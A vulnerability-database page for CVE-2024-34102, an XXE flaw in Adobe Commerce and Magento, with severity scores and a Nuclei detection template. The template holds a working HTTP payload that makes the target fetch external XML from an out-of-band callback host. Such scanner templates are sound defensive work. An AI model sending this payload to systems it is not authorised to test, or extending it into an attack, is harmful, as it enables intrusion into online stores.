Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-34102
HistoryJun 25, 2024 - 5:15 p.m.

Adobe Commerce & Magento - CosmicSting

2024-06-2517:15:09
ProjectDiscovery
github.com
153
adobe commerce
magento
cosmicsting
xxevulnerability
cve2024

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.973

Percentile

99.9%

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.
id: CVE-2024-34102

info:
  name: Adobe Commerce & Magento - CosmicSting
  author: DhiyaneshDK
  severity: critical
  description: |
    Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.
  reference:
    - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
    - https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-34102
    cwe-id: CWE-611
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Adobe-Magento"
  tags: cve,cve2024,adobe,magento,xxe

http:
  - raw:
      - |
        POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "application/json")'
          - 'contains_any(body, "log file", "cartId", "no Route")'
          - 'contains(body, "message")'
        condition: and
# digest: 490a00463044022035eed0094dc5d29ccf8a1f92e54752fe27ed32cfb86432cf5fcfe0d49475e64702205f85521b014b47759d272853294a0865ed415e31e84c52f04f30236409676efe:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.973

Percentile

99.9%